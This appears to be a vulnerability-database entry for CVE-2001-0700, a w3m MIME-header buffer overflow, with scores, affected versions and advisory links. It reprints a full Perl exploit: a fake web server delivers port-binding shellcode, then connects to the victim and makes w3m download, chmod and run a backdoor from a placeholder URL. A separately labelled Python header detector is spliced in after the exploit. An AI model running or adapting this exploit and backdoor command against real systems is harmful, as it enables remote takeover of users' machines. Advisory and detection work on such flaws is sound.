CVE-2001-0700
CVSS7.5
Published: 2001-09-20 00:00:00
Revised: 2008-09-05 16:24:43

[Original text] Buffer overflow in w3m 0.2.1 and earlier allows a remote attacker to execute arbitrary code via a long base64 encoded MIME header.


[CNNVD] w3m Buffer Overflow Vulnerability (CNNVD-200109-099)

w3m 0.2.1 and earlier versions contain a buffer overflow vulnerability. A remote attacker can execute arbitrary code via an over-long Base64-encoded MIME header.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance degradation or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:w3m:w3m:0.1.10
cpe:/a:w3m:w3m:0.1.7
cpe:/a:w3m:w3m:0.2
cpe:/a:w3m:w3m:0.1.8
cpe:/a:w3m:w3m:0.2.1
cpe:/a:w3m:w3m:0.1.6
cpe:/a:w3m:w3m:0.1.9
cpe:/a:w3m:w3m:0.1.3
cpe:/a:w3m:w3m:0.1.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0700
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0700
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-099
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/6725.php
(VENDOR_ADVISORY)  XF  w3m-mime-header-bo(6725)
http://www.securityfocus.com/bid/2895
(VENDOR_ADVISORY)  BID  2895
http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200106.month/537.html
(VENDOR_ADVISORY)  CONFIRM  http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200106.month/537.html
http://www.securityfocus.com/archive/1/192371
(UNKNOWN)  BUGTRAQ  20010621 [SNS Advisory No.32] w3m malformed MIME header Buffer Overflow Vulnerability
http://www.debian.org/security/2001/dsa-081
(UNKNOWN)  DEBIAN  DSA-081
http://www.debian.org/security/2001/dsa-064
(UNKNOWN)  DEBIAN  DSA-064
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000434
(UNKNOWN)  CONECTIVA  CLA-2001:434

- Vulnerability information

w3m Buffer Overflow Vulnerability
High risk  Buffer overflow
2001-09-20 00:00:00 2005-05-02 00:00:00
Remote
w3m 0.2.1 and earlier versions contain a buffer overflow vulnerability. A remote attacker can execute arbitrary code via an over-long Base64-encoded MIME header.

- Advisories and patches

- Vulnerability information (20941)

W3M 0.1/0.2 Malformed MIME Header Buffer Overflow Vulnerability (EDBID:20941)
freebsd remote
2001-06-19 Verified
0 White_E
source: http://www.securityfocus.com/bid/2895/info

W3M is a pager/text-based WWW browser similar to lynx.

A buffer overflow vulnerability exists in the 'w3m' client program. The overflow occurs when a base64-encoded string exceeding approximately 32 characters in length is received in a MIME header field. As a result, it may be possible for a malicious remote server to execute arbitrary code on a user's system.

#!/usr/bin/perl

# ---- exp_w3m.pl
# w3m remote buffer overflow exploit for FreeBSD.
# this fake httpd gives exploit code to visitor's w3m, then
# connects to victim's port 10000, downloads backdoor from
# $backdoor, and executes it.
# see also:
# ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:46.w3m.asc
# 
# 					White_E <white_e@bigfoot.com>
# 					http://ttj.virtualave.net/

$backdoor='http://www.../any.backdoor.prog.you.want';
$ret = 0xbfbffa2c;
$ret -= $ARGV[0];
$retb = pack("V",$ret); # little endian

$shellcode= # http://www.hack.co.za/download.php?sid=1444
            # portbind shell on 10000 by bighawk
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89".
"\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50".
"\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53".
"\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53".
"\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69".
"\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; # 86 bytes

use Socket;
$port=80;
$|=1;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
select(S);$|=1;select(STDOUT);
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
$paddr=sockaddr_in($port,INADDR_ANY);
bind(S,$paddr) || die "ERR: bind()\n";
listen(S,SOMAXCONN) || die "ERR: listen()\n";
print "listen on $port.\n";
$str  = "A" x 36;
$str .= $retb;
$str .= "\x90" x 128;
$str .= $shellcode;

while (1) {
  $victim=accept(VIC,S);
  $vaddr=(sockaddr_in($victim))[1];
  select(VIC);$|=1;select(STDOUT);
  $in=<VIC>;
  $in=<VIC>;
  print VIC "HTTP/1.0 200 OK\r\n";
  print VIC "MIME-Version: 1.0\r\n";
  print VIC "Content-Type: multipart/mixed; boundary=\"__=?$str\r\n";
  print VIC "\r\n";
  sleep(1);
  socket(BD,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
  $paddr=sockaddr_in('10000',$vaddr) || die "ERR: sockaddr_in\n";
  connect(BD,$paddr) || die "ERR: connect()\n";
  select(BD);$|=1;select(STDOUT);
  print BD "/usr/local/bin/w3m -dump_source $backdoor > /tmp/hoge \; /bin/chmod +x /tmp/hoge \; 
/tmp/hoge & \n";
  print "backdoor has been set.\n";
  close(BD);
}
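As a defensive check for the header shape described in the advisory above (an added example, not part of the EDB entry, the advisory, or the w3m project): it parses a raw HTTP response head and flags any `=?` encoded-word token whose charset or base64 field runs past the advisory's approximately-32-character figure. The function names, the threshold, the lax handling of an unterminated `=?` token, and both sample responses are constructed for this example.

```python
import re
from typing import List, Tuple

# Heuristic threshold taken from the advisory above: a base64 string of
# roughly 32+ characters in a MIME header overflowed w3m 0.2.1 and earlier.
MAX_FIELD_LEN = 32

# Loose RFC 2047 encoded-word matcher. The "?B?data" part and the closing
# "?=" are optional on purpose: the exploit on this page never closes the
# token, it just follows "=?" with the payload, and a strict matcher
# would miss exactly that case.
ENCODED_WORD_RE = re.compile(
    r"=\?(?P<charset>[^?]*)(?:\?(?P<enc>[BbQq])\?(?P<data>[^?]*))?(?:\?=)?"
)


def parse_headers(raw: bytes) -> List[Tuple[str, str]]:
    """Split a raw HTTP response head into lower-cased (name, value) pairs.
    latin-1 keeps every byte one-to-one (NOP sled and shellcode included),
    so field lengths reflect what the client would actually decode."""
    head = raw.decode("latin-1").split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # [1:] drops the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def find_oversized_encoded_words(raw: bytes) -> List[Tuple[str, str, int]]:
    """Return (header, field, length) for each '=?' token whose charset or
    encoded-data field is longer than MAX_FIELD_LEN characters."""
    findings = []
    for name, value in parse_headers(raw):
        for m in ENCODED_WORD_RE.finditer(value):
            for field in ("charset", "data"):
                part = m.group(field)
                if part and len(part) > MAX_FIELD_LEN:
                    findings.append((name, field, len(part)))
    return findings


# Constructed samples: a benign RFC 2047 header, and a Content-Type shaped
# like the exploit's, with a run of "A"s standing in for the real payload.
BENIGN = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n"
          b"Subject: =?ISO-8859-1?B?SGVsbG8gd29ybGQ=?=\r\n\r\n<html>")
SUSPECT = (b"HTTP/1.0 200 OK\r\nMIME-Version: 1.0\r\n"
           b'Content-Type: multipart/mixed; boundary="__=?' + b"A" * 36
           + b"\r\n\r\n")
```

Well-formed RFC 2047 encoded-words may legitimately exceed 32 characters, so a hit marks a response worth examining against an unpatched w3m rather than proof of an exploit attempt.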
		

- Vulnerability information

1876
w3m base64 MIME Header Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-06-21 Unknown
2001-06-21 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
